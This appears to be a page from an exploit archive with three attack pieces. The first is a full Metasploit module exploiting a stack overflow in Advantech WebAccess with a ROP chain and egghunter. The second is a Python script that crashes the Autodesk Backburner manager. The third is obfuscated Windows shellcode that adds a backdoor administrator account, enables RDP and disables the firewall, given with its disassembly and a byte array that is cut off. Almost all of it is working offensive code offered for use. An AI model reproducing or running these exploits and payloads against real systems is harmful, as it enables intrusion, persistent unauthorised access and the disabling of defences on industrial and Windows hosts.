
  1. ## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::DCERPC include Msf::Exploit::Egghunter def initialize(info = {}) super(update_info(info, 'Name' => 'Advantech WebAccess Webvrpcs Service Opcode 80061 Stack Buffer Overflow', 'Description' => %q{ This module exploits a stack buffer overflow in Advantech WebAccess 8.2. By sending a specially crafted DCERPC request, an attacker could overflow the buffer and execute arbitrary code. }, 'Author' => [ 'mr_me <mr_me[at]offensive-security[dot]com>' ], 'License' => MSF_LICENSE, 'References' => [ [ 'ZDI', '17-938' ], [ 'CVE', '2017-14016' ], [ 'URL', 'https://ics-cert.us-cert.gov/advisories/ICSA-17-306-02' ] ], 'Privileged' => true, 'DefaultOptions' => { 'EXITFUNC' => 'thread', }, 'Payload' => { 'Space' => 2048, 'BadChars' => "\x00", }, 'Platform' => 'win', 'Targets' => [ [ 'Windows 7 x86 - Advantech WebAccess 8.2-2017.03.31', { 'Ret' => 0x07036cdc, # pop ebx; add esp, 994; retn 0x14 'Slide' => 0x07048f5b, # retn 'Jmp' => 0x0706067e # pop ecx; pop ecx; ret 0x04 } ], ], 'DisclosureDate' => 'Nov 02 2017', 'DefaultTarget' => 0)) register_options([ Opt::RPORT(4592)]) end def create_rop_chain() # this target opts into dep rop_gadgets = [ 0x020214c6, # POP EAX # RETN [BwKrlAPI.dll] 0x0203a134, # ptr to &VirtualAlloc() [IAT BwKrlAPI.dll] 0x02032fb4, # MOV EAX,DWORD PTR DS:[EAX] # RETN [BwKrlAPI.dll] 0x070738ee, # XCHG EAX,ESI # RETN [BwPAlarm.dll] 0x0201a646, # POP EBP # RETN [BwKrlAPI.dll] 0x07024822, # & push esp # ret [BwPAlarm.dll] 0x070442dd, # POP EAX # RETN [BwPAlarm.dll] 0xffffffff, # Value to negate, will become 0x00000001 0x070467d2, # NEG EAX # RETN [BwPAlarm.dll] 0x0704de61, # PUSH EAX # ADD ESP,0C # POP EBX # RETN [BwPAlarm.dll] rand_text_alpha(4).unpack('V'), rand_text_alpha(4).unpack('V'), rand_text_alpha(4).unpack('V'), 0x02030af7, # 
POP EAX # RETN [BwKrlAPI.dll] 0xfbdbcbd5, # put delta into eax (-> put 0x00001000 into edx) 0x02029003, # ADD EAX,424442B # RETN [BwKrlAPI.dll] 0x0201234a, # XCHG EAX,EDX # RETN [BwKrlAPI.dll] 0x07078df5, # POP EAX # RETN [BwPAlarm.dll] 0xffffffc0, # Value to negate, will become 0x00000040 0x070467d2, # NEG EAX # RETN [BwPAlarm.dll] 0x07011e60, # PUSH EAX # ADD AL,5B # POP ECX # RETN 0x08 [BwPAlarm.dll] 0x0706fe66, # POP EDI # RETN [BwPAlarm.dll] rand_text_alpha(4).unpack('V'), rand_text_alpha(4).unpack('V'), 0x0703d825, # RETN (ROP NOP) [BwPAlarm.dll] 0x0202ca65, # POP EAX # RETN [BwKrlAPI.dll] 0x90909090, # nop 0x07048f5a, # PUSHAD # RETN [BwPAlarm.dll] ].flatten.pack("V*") return rop_gadgets end def exploit connect handle = dcerpc_handle('5d2b62aa-ee0a-4a95-91ae-b064fdb471fc', '1.0', 'ncacn_ip_tcp', [datastore['RPORT']]) print_status("Binding to #{handle} ...") dcerpc_bind(handle) print_status("Bound to #{handle} ...") # send the request to get the handle resp = dcerpc.call(0x4, [0x02000000].pack('V')) handle = resp.last(4).unpack('V').first print_good("Got a handle: 0x%08x" % handle) egg_options = { :eggtag => "0day" } egghunter, egg = generate_egghunter(payload.encoded, payload_badchars, egg_options) # apparently this is called a ret chain overflow = [target['Slide']].pack('V') overflow << [target['Slide']].pack('V') overflow << [target['Slide']].pack('V') overflow << [target['Slide']].pack('V') overflow << [target['Slide']].pack('V') overflow << [target['Slide']].pack('V') overflow << [target['Jmp']].pack('V') overflow << [target['Ret']].pack('V') overflow << [target['Slide']].pack('V') overflow << [target['Slide']].pack('V') overflow << [target['Slide']].pack('V') overflow << [target['Slide']].pack('V') overflow << [target['Slide']].pack('V') overflow << [target['Slide']].pack('V') overflow << create_rop_chain() overflow << egghunter overflow << egg overflow << rand_text_alpha(0x1000-overflow.length) # sorry but I dont like msf's ndr class. 
sploit = [handle].pack('V') sploit << [0x000138bd].pack('V') # opcode we are attacking sploit << [0x00001000].pack('V') # size to copy sploit << [0x00001000].pack('V') # size of string sploit << overflow print_status("Trying target #{target.name}...") begin dcerpc_call(0x1, sploit) rescue Rex::Proto::DCERPC::Exceptions::NoResponse ensure disconnect end handler end end
  2. import sys import datetime import socket import argparse import os import time remote_host = '' remote_port = '' def callExit(): print "\n\t\t[!] exiting at %s .....\n" % datetime.datetime.now() sys.exit(1) def mySocket(): try: s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) except socket.error: print 'Failed to create socket' sys.exit() print "\n\t[+] Socket Created" s.connect((remote_host, remote_port)) print "\n\t[+] Socket Connected to %s on port %s" % (remote_host, remote_port) return s # 250 backburner 1.0 Ready. def receiveBanner(s): banner = s.recv(4096) print banner def receiveData(s): data = s.recv(4096) print data def setDataCommand(s): receiveData(s) # backburner> print "Set Data Command" time.sleep(1) command = "set data\r\n" try: s.sendall(command) except socket.error: print 'Send failed' sys.exit() print "BackBurner Manager should have crashed" receiveData(s) # 200 Help receiveData(s) # Available Commands:.....and all set of commands # backburner> def main(): if sys.platform == 'linux-i386' or sys.platform == 'linux2' or sys.platform == 'darwin': os.system('clear') parser = argparse.ArgumentParser(description = 'RCE Autodesk BackBurner') parser.add_argument('--host', nargs='?', dest='host', required=True, help='remote IP of Autodesk host') parser.add_argument('--port', nargs='?', dest='port', default=3234, help='remote Port running manager.exe') args = parser.parse_args() if args.host == None: print "\t[!] IP of remote host?" sys.exit() global remote_host global remote_port remote_host = args.host remote_port = args.port print "remote_host: %s" % remote_host print "remote_port: %s" % remote_port s = mySocket() receiveBanner(s) setDataCommand(s) print 'exit' sys.exit() if __name__ == '__main__': try: sys.exit(main()) except KeyboardInterrupt: callExit()
  3. #Author: Ali Razmjoo #Title: Obfuscated Shellcode Windows x64 [1218 Bytes] [Add Administrator User/Pass ALI/ALI & Add ALI to RDP Group & Enable RDP From Registery & STOP Firewall & Auto Start terminal service] Obfuscated Shellcode Windows x64 [1218 Bytes].c /* #Title: Obfuscated Shellcode Windows x64 [1218 Bytes] [Add Administrator User/Pass ALI/ALI & Add ALI to RDP Group & Enable RDP From Registery & STOP Firewall & Auto Start terminal service] #length: 1218 bytes #Date: 13 January 2015 #Author: Ali Razmjoo #tested On: Windows 7 x64 ultimate WinExec => 0x769e2c91 ExitProcess => 0x769679f8 ==================================== Execute : net user ALI ALI /add net localgroup Administrators ALI /add NET LOCALGROUP "Remote Desktop Users" ALI /add reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 1 /f netsh firewall set opmode disable sc config termservice start= auto ==================================== Ali Razmjoo , ['[email protected]','[email protected]'] Thanks to my friends , Dariush Nasirpour and Ehsan Nezami C:\Users\Ali\Desktop>objdump -D shellcode.o shellcode.o: file format elf32-i386 Disassembly of section .text: 00000000 <.text>: 0: 31 c0 xor %eax,%eax 2: 50 push %eax 3: b8 41 41 41 64 mov $0x64414141,%eax 8: c1 e8 08 shr $0x8,%eax b: c1 e8 08 shr $0x8,%eax e: c1 e8 08 shr $0x8,%eax 11: 50 push %eax 12: b9 6d 76 53 52 mov $0x5253766d,%ecx 17: ba 4d 59 32 36 mov $0x3632594d,%edx 1c: 31 d1 xor %edx,%ecx 1e: 51 push %ecx 1f: b9 6e 72 61 71 mov $0x7161726e,%ecx 24: ba 4e 33 2d 38 mov $0x382d334e,%edx 29: 31 d1 xor %edx,%ecx 2b: 51 push %ecx 2c: b9 6c 75 78 78 mov $0x7878756c,%ecx 31: ba 4c 34 34 31 mov $0x3134344c,%edx 36: 31 d1 xor %edx,%ecx 38: 51 push %ecx 39: b9 46 47 57 46 mov $0x46574746,%ecx 3e: ba 33 34 32 34 mov $0x34323433,%edx 43: 31 d1 xor %edx,%ecx 45: 51 push %ecx 46: b9 56 50 47 64 mov $0x64475056,%ecx 4b: ba 38 35 33 44 mov $0x44333538,%edx 50: 31 d1 xor %edx,%ecx 52: 51 push 
%ecx 53: 89 e0 mov %esp,%eax 55: bb 41 41 41 01 mov $0x1414141,%ebx 5a: c1 eb 08 shr $0x8,%ebx 5d: c1 eb 08 shr $0x8,%ebx 60: c1 eb 08 shr $0x8,%ebx 63: 53 push %ebx 64: 50 push %eax 65: bb dc 7a a8 23 mov $0x23a87adc,%ebx 6a: ba 4d 56 36 55 mov $0x5536564d,%edx 6f: 31 d3 xor %edx,%ebx 71: ff d3 call *%ebx 73: 31 c0 xor %eax,%eax 75: 50 push %eax 76: 68 41 41 64 64 push $0x64644141 7b: 58 pop %eax 7c: c1 e8 08 shr $0x8,%eax 7f: c1 e8 08 shr $0x8,%eax 82: 50 push %eax 83: b9 01 41 60 32 mov $0x32604101,%ecx 88: ba 48 61 4f 53 mov $0x534f6148,%edx 8d: 31 d1 xor %edx,%ecx 8f: 51 push %ecx 90: b9 28 47 0d 2f mov $0x2f0d4728,%ecx 95: ba 5b 67 4c 63 mov $0x634c675b,%edx 9a: 31 d1 xor %edx,%ecx 9c: 51 push %ecx 9d: b9 03 24 36 21 mov $0x21362403,%ecx a2: ba 62 50 59 53 mov $0x53595062,%edx a7: 31 d1 xor %edx,%ecx a9: 51 push %ecx aa: b9 34 41 15 18 mov $0x18154134,%ecx af: ba 5d 32 61 6a mov $0x6a61325d,%edx b4: 31 d1 xor %edx,%ecx b6: 51 push %ecx b7: b9 0c 05 1b 25 mov $0x251b050c,%ecx bc: ba 68 68 72 4b mov $0x4b726868,%edx c1: 31 d1 xor %edx,%ecx c3: 51 push %ecx c4: b9 2f 27 7b 13 mov $0x137b272f,%ecx c9: ba 5a 57 5b 52 mov $0x525b575a,%edx ce: 31 d1 xor %edx,%ecx d0: 51 push %ecx d1: b9 1c 2c 02 3e mov $0x3e022c1c,%ecx d6: ba 70 4b 70 51 mov $0x51704b70,%edx db: 31 d1 xor %edx,%ecx dd: 51 push %ecx de: b9 3d 2a 32 4c mov $0x4c322a3d,%ecx e3: ba 51 45 51 2d mov $0x2d514551,%edx e8: 31 d1 xor %edx,%ecx ea: 51 push %ecx eb: b9 23 5c 1c 19 mov $0x191c5c23,%ecx f0: ba 4d 39 68 39 mov $0x3968394d,%edx f5: 31 d1 xor %edx,%ecx f7: 51 push %ecx f8: 89 e0 mov %esp,%eax fa: bb 41 41 41 01 mov $0x1414141,%ebx ff: c1 eb 08 shr $0x8,%ebx 102: c1 eb 08 shr $0x8,%ebx 105: c1 eb 08 shr $0x8,%ebx 108: 53 push %ebx 109: 50 push %eax 10a: bb dc 7a a8 23 mov $0x23a87adc,%ebx 10f: ba 4d 56 36 55 mov $0x5536564d,%edx 114: 31 d3 xor %edx,%ebx 116: ff d3 call *%ebx 118: 31 c0 xor %eax,%eax 11a: 50 push %eax 11b: 68 41 41 64 64 push $0x64644141 120: 58 pop %eax 121: c1 e8 08 shr $0x8,%eax 
124: c1 e8 08 shr $0x8,%eax 127: 50 push %eax 128: b9 02 63 6b 35 mov $0x356b6302,%ecx 12d: ba 4b 43 44 54 mov $0x5444434b,%edx 132: 31 d1 xor %edx,%ecx 134: 51 push %ecx 135: b9 61 55 6c 3d mov $0x3d6c5561,%ecx 13a: ba 43 75 2d 71 mov $0x712d7543,%edx 13f: 31 d1 xor %edx,%ecx 141: 51 push %ecx 142: b9 27 3f 3b 1a mov $0x1a3b3f27,%ecx 147: ba 54 5a 49 69 mov $0x69495a54,%edx 14c: 31 d1 xor %edx,%ecx 14e: 51 push %ecx 14f: b9 25 34 12 67 mov $0x67123425,%ecx 154: ba 4a 44 32 32 mov $0x3232444a,%edx 159: 31 d1 xor %edx,%ecx 15b: 51 push %ecx 15c: b9 0b 02 1f 19 mov $0x191f020b,%ecx 161: ba 6e 71 74 6d mov $0x6d74716e,%edx 166: 31 d1 xor %edx,%ecx 168: 51 push %ecx 169: b9 39 3f 7b 15 mov $0x157b3f39,%ecx 16e: ba 4d 5a 5b 51 mov $0x515b5a4d,%edx 173: 31 d1 xor %edx,%ecx 175: 51 push %ecx 176: b9 35 15 03 2a mov $0x2a031535,%ecx 17b: ba 67 70 6e 45 mov $0x456e7067,%edx 180: 31 d1 xor %edx,%ecx 182: 51 push %ecx 183: b9 3a 17 75 46 mov $0x4675173a,%ecx 188: ba 6f 47 55 64 mov $0x6455476f,%edx 18d: 31 d1 xor %edx,%ecx 18f: 51 push %ecx 190: b9 26 35 0b 1e mov $0x1e0b3526,%ecx 195: ba 6a 72 59 51 mov $0x5159726a,%edx 19a: 31 d1 xor %edx,%ecx 19c: 51 push %ecx 19d: b9 2a 2a 06 2a mov $0x2a062a2a,%ecx 1a2: ba 66 65 45 6b mov $0x6b456566,%edx 1a7: 31 d1 xor %edx,%ecx 1a9: 51 push %ecx 1aa: b9 1d 20 35 5a mov $0x5a35201d,%ecx 1af: ba 53 65 61 7a mov $0x7a616553,%edx 1b4: 31 d1 xor %edx,%ecx 1b6: 51 push %ecx 1b7: 89 e0 mov %esp,%eax 1b9: bb 41 41 41 01 mov $0x1414141,%ebx 1be: c1 eb 08 shr $0x8,%ebx 1c1: c1 eb 08 shr $0x8,%ebx 1c4: c1 eb 08 shr $0x8,%ebx 1c7: 53 push %ebx 1c8: 50 push %eax 1c9: bb dc 7a a8 23 mov $0x23a87adc,%ebx 1ce: ba 4d 56 36 55 mov $0x5536564d,%edx 1d3: 31 d3 xor %edx,%ebx 1d5: ff d3 call *%ebx 1d7: 31 c0 xor %eax,%eax 1d9: 50 push %eax 1da: b9 09 4c 7c 5e mov $0x5e7c4c09,%ecx 1df: ba 38 6c 53 38 mov $0x38536c38,%edx 1e4: 31 d1 xor %edx,%ecx 1e6: 51 push %ecx 1e7: b9 42 4d 39 14 mov $0x14394d42,%ecx 1ec: ba 62 62 5d 34 mov $0x345d6262,%edx 1f1: 31 d1 xor 
%edx,%ecx 1f3: 51 push %ecx 1f4: b9 7a 24 26 75 mov $0x7526247a,%ecx 1f9: ba 2d 6b 74 31 mov $0x31746b2d,%edx 1fe: 31 d1 xor %edx,%ecx 200: 51 push %ecx 201: b9 1d 30 15 28 mov $0x2815301d,%ecx 206: ba 58 77 4a 6c mov $0x6c4a7758,%edx 20b: 31 d1 xor %edx,%ecx 20d: 51 push %ecx 20e: b9 7c 2f 57 16 mov $0x16572f7c,%ecx 213: ba 53 5b 77 44 mov $0x44775b53,%edx 218: 31 d1 xor %edx,%ecx 21a: 51 push %ecx 21b: b9 42 25 2a 66 mov $0x662a2542,%ecx 220: ba 2d 4b 59 46 mov $0x46594b2d,%edx 225: 31 d1 xor %edx,%ecx 227: 51 push %ecx 228: b9 28 2f 0c 5a mov $0x5a0c2f28,%ecx 22d: ba 4d 4c 78 33 mov $0x33784c4d,%edx 232: 31 d1 xor %edx,%ecx 234: 51 push %ecx 235: b9 20 2b 26 26 mov $0x26262b20,%ecx 23a: ba 63 44 48 48 mov $0x48484463,%edx 23f: 31 d1 xor %edx,%ecx 241: 51 push %ecx 242: b9 08 2b 23 67 mov $0x67232b08,%ecx 247: ba 66 52 77 34 mov $0x34775266,%edx 24c: 31 d1 xor %edx,%ecx 24e: 51 push %ecx 24f: b9 49 1c 2e 48 mov $0x482e1c49,%ecx 254: ba 69 7a 6a 2d mov $0x2d6a7a69,%edx 259: 31 d1 xor %edx,%ecx 25b: 51 push %ecx 25c: b9 67 67 1d 37 mov $0x371d6767,%ecx 261: ba 45 47 32 41 mov $0x41324745,%edx 266: 31 d1 xor %edx,%ecx 268: 51 push %ecx 269: b9 03 33 0d 3b mov $0x3b0d3303,%ecx 26e: ba 71 45 68 49 mov $0x49684571,%edx 273: 31 d1 xor %edx,%ecx 275: 51 push %ecx 276: b9 39 6a 3c 2f mov $0x2f3c6a39,%ecx 27b: ba 55 4a 6f 4a mov $0x4a6f4a55,%edx 280: 31 d1 xor %edx,%ecx 282: 51 push %ecx 283: b9 37 44 1f 2e mov $0x2e1f4437,%ecx 288: ba 5a 2d 71 4f mov $0x4f712d5a,%edx 28d: 31 d1 xor %edx,%ecx 28f: 51 push %ecx 290: b9 34 23 23 3b mov $0x3b232334,%ecx 295: ba 68 77 46 49 mov $0x49467768,%edx 29a: 31 d1 xor %edx,%ecx 29c: 51 push %ecx 29d: b9 07 3a 0a 14 mov $0x140a3a07,%ecx 2a2: ba 73 48 65 78 mov $0x78654873,%edx 2a7: 31 d1 xor %edx,%ecx 2a9: 51 push %ecx 2aa: b9 14 2e 58 53 mov $0x53582e14,%ecx 2af: ba 48 6d 37 3d mov $0x3d376d48,%edx 2b4: 31 d1 xor %edx,%ecx 2b6: 51 push %ecx 2b7: b9 3e 3d 26 32 mov $0x32263d3e,%ecx 2bc: ba 52 6e 43 46 mov $0x46436e52,%edx 2c1: 31 d1 xor 
%edx,%ecx 2c3: 51 push %ecx 2c4: b9 33 3c 35 34 mov $0x34353c33,%ecx 2c9: ba 5d 48 47 5b mov $0x5b47485d,%edx 2ce: 31 d1 xor %edx,%ecx 2d0: 51 push %ecx 2d1: b9 36 0e 07 2b mov $0x2b070e36,%ecx 2d6: ba 58 7a 44 44 mov $0x44447a58,%edx 2db: 31 d1 xor %edx,%ecx 2dd: 51 push %ecx 2de: b9 3c 10 0a 37 mov $0x370a103c,%ecx 2e3: ba 49 62 78 52 mov $0x52786249,%edx 2e8: 31 d1 xor %edx,%ecx 2ea: 51 push %ecx 2eb: b9 24 7c 3b 36 mov $0x363b7c24,%ecx 2f0: ba 61 31 67 75 mov $0x75673161,%edx 2f5: 31 d1 xor %edx,%ecx 2f7: 51 push %ecx 2f8: b9 31 3d 3b 27 mov $0x273b3d31,%ecx 2fd: ba 62 64 68 73 mov $0x73686462,%edx 302: 31 d1 xor %edx,%ecx 304: 51 push %ecx 305: b9 7f 7d 3d 35 mov $0x353d7d7f,%ecx 30a: ba 36 33 78 69 mov $0x69783336,%edx 30f: 31 d1 xor %edx,%ecx 311: 51 push %ecx 312: b9 7c 13 0f 2f mov $0x2f0f137c,%ecx 317: ba 31 52 4c 67 mov $0x674c5231,%edx 31c: 31 d1 xor %edx,%ecx 31e: 51 push %ecx 31f: b9 1b 08 35 2d mov $0x2d35081b,%ecx 324: ba 58 49 79 72 mov $0x72794958,%edx 329: 31 d1 xor %edx,%ecx 32b: 51 push %ecx 32c: b9 74 3a 1e 21 mov $0x211e3a74,%ecx 331: ba 2d 65 52 6e mov $0x6e52652d,%edx 336: 31 d1 xor %edx,%ecx 338: 51 push %ecx 339: b9 16 10 1f 17 mov $0x171f1016,%ecx 33e: ba 34 58 54 52 mov $0x52545834,%edx 343: 31 d1 xor %edx,%ecx 345: 51 push %ecx 346: b9 2f 27 0c 6e mov $0x6e0c272f,%ecx 34b: ba 4e 43 68 4e mov $0x4e68434e,%edx 350: 31 d1 xor %edx,%ecx 352: 51 push %ecx 353: b9 39 22 5e 50 mov $0x505e2239,%ecx 358: ba 4b 47 39 70 mov $0x7039474b,%edx 35d: 31 d1 xor %edx,%ecx 35f: 51 push %ecx 360: 89 e0 mov %esp,%eax 362: bb 41 41 41 01 mov $0x1414141,%ebx 367: c1 eb 08 shr $0x8,%ebx 36a: c1 eb 08 shr $0x8,%ebx 36d: c1 eb 08 shr $0x8,%ebx 370: 53 push %ebx 371: 50 push %eax 372: bb dc 7a a8 23 mov $0x23a87adc,%ebx 377: ba 4d 56 36 55 mov $0x5536564d,%edx 37c: 31 d3 xor %edx,%ebx 37e: ff d3 call *%ebx 380: 31 c0 xor %eax,%eax 382: 50 push %eax 383: b8 41 41 41 65 mov $0x65414141,%eax 388: c1 e8 08 shr $0x8,%eax 38b: c1 e8 08 shr $0x8,%eax 38e: c1 e8 08 shr 
$0x8,%eax 391: 50 push %eax 392: b9 1e 53 39 3c mov $0x3c39531e,%ecx 397: ba 6d 32 5b 50 mov $0x505b326d,%edx 39c: 31 d1 xor %edx,%ecx 39e: 51 push %ecx 39f: b9 04 66 2f 32 mov $0x322f6604,%ecx 3a4: ba 61 46 4b 5b mov $0x5b4b4661,%edx 3a9: 31 d1 xor %edx,%ecx 3ab: 51 push %ecx 3ac: b9 19 1e 0d 11 mov $0x110d1e19,%ecx 3b1: ba 69 73 62 75 mov $0x75627369,%edx 3b6: 31 d1 xor %edx,%ecx 3b8: 51 push %ecx 3b9: b9 20 41 47 36 mov $0x36474120,%ecx 3be: ba 45 35 67 59 mov $0x59673545,%edx 3c3: 31 d1 xor %edx,%ecx 3c5: 51 push %ecx 3c6: b9 2b 05 64 2a mov $0x2a64052b,%ecx 3cb: ba 47 69 44 59 mov $0x59446947,%edx 3d0: 31 d1 xor %edx,%ecx 3d2: 51 push %ecx 3d3: b9 10 3f 4f 22 mov $0x224f3f10,%ecx 3d8: ba 62 5a 38 43 mov $0x43385a62,%edx 3dd: 31 d1 xor %edx,%ecx 3df: 51 push %ecx 3e0: b9 2a 6f 2a 24 mov $0x242a6f2a,%ecx 3e5: ba 42 4f 4c 4d mov $0x4d4c4f42,%edx 3ea: 31 d1 xor %edx,%ecx 3ec: 51 push %ecx 3ed: b9 29 09 1e 5e mov $0x5e1e0929,%ecx 3f2: ba 47 6c 6a 2d mov $0x2d6a6c47,%edx 3f7: 31 d1 xor %edx,%ecx 3f9: 51 push %ecx 3fa: 89 e0 mov %esp,%eax 3fc: bb 41 41 41 01 mov $0x1414141,%ebx 401: c1 eb 08 shr $0x8,%ebx 404: c1 eb 08 shr $0x8,%ebx 407: c1 eb 08 shr $0x8,%ebx 40a: 53 push %ebx 40b: 50 push %eax 40c: bb dc 7a a8 23 mov $0x23a87adc,%ebx 411: ba 4d 56 36 55 mov $0x5536564d,%edx 416: 31 d3 xor %edx,%ebx 418: ff d3 call *%ebx 41a: 31 c0 xor %eax,%eax 41c: 50 push %eax 41d: b8 41 41 41 6f mov $0x6f414141,%eax 422: c1 e8 08 shr $0x8,%eax 425: c1 e8 08 shr $0x8,%eax 428: c1 e8 08 shr $0x8,%eax 42b: 50 push %eax 42c: b9 72 2a 05 39 mov $0x39052a72,%ecx 431: ba 52 4b 70 4d mov $0x4d704b52,%edx 436: 31 d1 xor %edx,%ecx 438: 51 push %ecx 439: b9 54 3a 05 52 mov $0x52053a54,%ecx 43e: ba 35 48 71 6f mov $0x6f714835,%edx 443: 31 d1 xor %edx,%ecx 445: 51 push %ecx 446: b9 29 16 0a 47 mov $0x470a1629,%ecx 44b: ba 4c 36 79 33 mov $0x3379364c,%edx 450: 31 d1 xor %edx,%ecx 452: 51 push %ecx 453: b9 27 1b 5b 3e mov $0x3e5b1b27,%ecx 458: ba 55 6d 32 5d mov $0x5d326d55,%edx 45d: 31 d1 xor 
%edx,%ecx 45f: 51 push %ecx 460: b9 33 1a 3b 10 mov $0x103b1a33,%ecx 465: ba 41 77 48 75 mov $0x75487741,%edx 46a: 31 d1 xor %edx,%ecx 46c: 51 push %ecx 46d: b9 34 79 3a 12 mov $0x123a7934,%ecx 472: ba 53 59 4e 77 mov $0x774e5953,%edx 477: 31 d1 xor %edx,%ecx 479: 51 push %ecx 47a: b9 1d 5c 1e 28 mov $0x281e5c1d,%ecx 47f: ba 72 32 78 41 mov $0x41783272,%edx 484: 31 d1 xor %edx,%ecx 486: 51 push %ecx 487: b9 2a 4e 5a 28 mov $0x285a4e2a,%ecx 48c: ba 59 2d 7a 4b mov $0x4b7a2d59,%edx 491: 31 d1 xor %edx,%ecx 493: 51 push %ecx 494: 89 e0 mov %esp,%eax 496: bb 41 41 41 01 mov $0x1414141,%ebx 49b: c1 eb 08 shr $0x8,%ebx 49e: c1 eb 08 shr $0x8,%ebx 4a1: c1 eb 08 shr $0x8,%ebx 4a4: 53 push %ebx 4a5: 50 push %eax 4a6: bb dc 7a a8 23 mov $0x23a87adc,%ebx 4ab: ba 4d 56 36 55 mov $0x5536564d,%edx 4b0: 31 d3 xor %edx,%ebx 4b2: ff d3 call *%ebx 4b4: bb 9b 4f d0 30 mov $0x30d04f9b,%ebx 4b9: ba 63 36 46 46 mov $0x46463663,%edx 4be: 31 d3 xor %edx,%ebx 4c0: ff d3 call *%ebx */ #include <stdio.h> #include <string.h> int main(){ unsigned char shellcode[]= 
"\x31\xc0\x50\xb8\x41\x41\x41\x64\xc1\xe8\x08\xc1\xe8\x08\xc1\xe8\x08\x50\xb9\x6d\x76\x53\x52\xba\x4d\x59\x32\x36\x31\xd1\x51\xb9\x6e\x72\x61\x71\xba\x4e\x33\x2d\x38\x31\xd1\x51\xb9\x6c\x75\x78\x78\xba\x4c\x34\x34\x31\x31\xd1\x51\xb9\x46\x47\x57\x46\xba\x33\x34\x32\x34\x31\xd1\x51\xb9\x56\x50\x47\x64\xba\x38\x35\x33\x44\x31\xd1\x51\x89\xe0\xbb\x41\x41\x41\x01\xc1\xeb\x08\xc1\xeb\x08\xc1\xeb\x08\x53\x50\xbb\xdc\x7a\xa8\x23\xba\x4d\x56\x36\x55\x31\xd3\xff\xd3\x31\xc0\x50\x68\x41\x41\x64\x64\x58\xc1\xe8\x08\xc1\xe8\x08\x50\xb9\x01\x41\x60\x32\xba\x48\x61\x4f\x53\x31\xd1\x51\xb9\x28\x47\x0d\x2f\xba\x5b\x67\x4c\x63\x31\xd1\x51\xb9\x03\x24\x36\x21\xba\x62\x50\x59\x53\x31\xd1\x51\xb9\x34\x41\x15\x18\xba\x5d\x32\x61\x6a\x31\xd1\x51\xb9\x0c\x05\x1b\x25\xba\x68\x68\x72\x4b\x31\xd1\x51\xb9\x2f\x27\x7b\x13\xba\x5a\x57\x5b\x52\x31\xd1\x51\xb9\x1c\x2c\x02\x3e\xba\x70\x4b\x70\x51\x31\xd1\x51\xb9\x3d\x2a\x32\x4c\xba\x51\x45\x51\x2d\x31\xd1\x51\xb9\x23\x5c\x1c\x19\xba\x4d\x39\x68\x39\x31\xd1\x51\x89\xe0\xbb\x41\x41\x41\x01\xc1\xeb\x08\xc1\xeb\x08\xc1\xeb\x08\x53\x50\xbb\xdc\x7a\xa8\x23\xba\x4d\x56\x36\x55\x31\xd3\xff\xd3\x31\xc0\x50\x68\x41\x41\x64\x64\x58\xc1\xe8\x08\xc1\xe8\x08\x50\xb9\x02\x63\x6b\x35\xba\x4b\x43\x44\x54\x31\xd1\x51\xb9\x61\x55\x6c\x3d\xba\x43\x75\x2d\x71\x31\xd1\x51\xb9\x27\x3f\x3b\x1a\xba\x54\x5a\x49\x69\x31\xd1\x51\xb9\x25\x34\x12\x67\xba\x4a\x44\x32\x32\x31\xd1\x51\xb9\x0b\x02\x1f\x19\xba\x6e\x71\x74\x6d\x31\xd1\x51\xb9\x39\x3f\x7b\x15\xba\x4d\x5a\x5b\x51\x31\xd1\x51\xb9\x35\x15\x03\x2a\xba\x67\x70\x6e\x45\x31\xd1\x51\xb9\x3a\x17\x75\x46\xba\x6f\x47\x55\x64\x31\xd1\x51\xb9\x26\x35\x0b\x1e\xba\x6a\x72\x59\x51\x31\xd1\x51\xb9\x2a\x2a\x06\x2a\xba\x66\x65\x45\x6b\x31\xd1\x51\xb9\x1d\x20\x35\x5a\xba\x53\x65\x61\x7a\x31\xd1\x51\x89\xe0\xbb\x41\x41\x41\x01\xc1\xeb\x08\xc1\xeb\x08\xc1\xeb\x08\x53\x50\xbb\xdc\x7a\xa8\x23\xba\x4d\x56\x36\x55\x31\xd3\xff\xd3\x31\xc0\x50\xb9\x09\x4c\x7c\x5e\xba\x38\x6c\x53\x38\x31\xd1\x51\xb9\x42\x4d\x39\x14\xba\x62\x62\x5d\x34\x31\xd1\x5
1\xb9\x7a\x24\x26\x75\xba\x2d\x6b\x74\x31\x31\xd1\x51\xb9\x1d\x30\x15\x28\xba\x58\x77\x4a\x6c\x31\xd1\x51\xb9\x7c\x2f\x57\x16\xba\x53\x5b\x77\x44\x31\xd1\x51\xb9\x42\x25\x2a\x66\xba\x2d\x4b\x59\x46\x31\xd1\x51\xb9\x28\x2f\x0c\x5a\xba\x4d\x4c\x78\x33\x31\xd1\x51\xb9\x20\x2b\x26\x26\xba\x63\x44\x48\x48\x31\xd1\x51\xb9\x08\x2b\x23\x67\xba\x66\x52\x77\x34\x31\xd1\x51\xb9\x49\x1c\x2e\x48\xba\x69\x7a\x6a\x2d\x31\xd1\x51\xb9\x67\x67\x1d\x37\xba\x45\x47\x32\x41\x31\xd1\x51\xb9\x03\x33\x0d\x3b\xba\x71\x45\x68\x49\x31\xd1\x51\xb9\x39\x6a\x3c\x2f\xba\x55\x4a\x6f\x4a\x31\xd1\x51\xb9\x37\x44\x1f\x2e\xba\x5a\x2d\x71\x4f\x31\xd1\x51\xb9\x34\x23\x23\x3b\xba\x68\x77\x46\x49\x31\xd1\x51\xb9\x07\x3a\x0a\x14\xba\x73\x48\x65\x78\x31\xd1\x51\xb9\x14\x2e\x58\x53\xba\x48\x6d\x37\x3d\x31\xd1\x51\xb9\x3e\x3d\x26\x32\xba\x52\x6e\x43\x46\x31\xd1\x51\xb9\x33\x3c\x35\x34\xba\x5d\x48\x47\x5b\x31\xd1\x51\xb9\x36\x0e\x07\x2b\xba\x58\x7a\x44\x44\x31\xd1\x51\xb9\x3c\x10\x0a\x37\xba\x49\x62\x78\x52\x31\xd1\x51\xb9\x24\x7c\x3b\x36\xba\x61\x31\x67\x75\x31\xd1\x51\xb9\x31\x3d\x3b\x27\xba\x62\x64\x68\x73\x31\xd1\x51\xb9\x7f\x7d\x3d\x35\xba\x36\x33\x78\x69\x31\xd1\x51\xb9\x7c\x13\x0f\x2f\xba\x31\x52\x4c\x67\x31\xd1\x51\xb9\x1b\x08\x